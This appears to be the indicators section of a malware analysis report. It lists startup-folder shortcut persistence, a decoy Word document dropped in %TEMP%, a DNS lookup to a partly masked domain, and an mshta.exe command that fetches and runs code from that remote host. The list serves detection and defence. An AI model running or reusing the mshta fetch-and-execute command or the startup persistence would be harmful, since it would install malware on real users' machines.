Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\helppane.lnk
- %APPDATA%\microsoft\windows\start menu\programs\startup\helppani.lnk
- %TEMP%\newsaj.docx
- DNS ASK ad###ews.for.ug
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\mshta.exe' http://ad###ews.for.ug/2020
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\Newsaj.docx"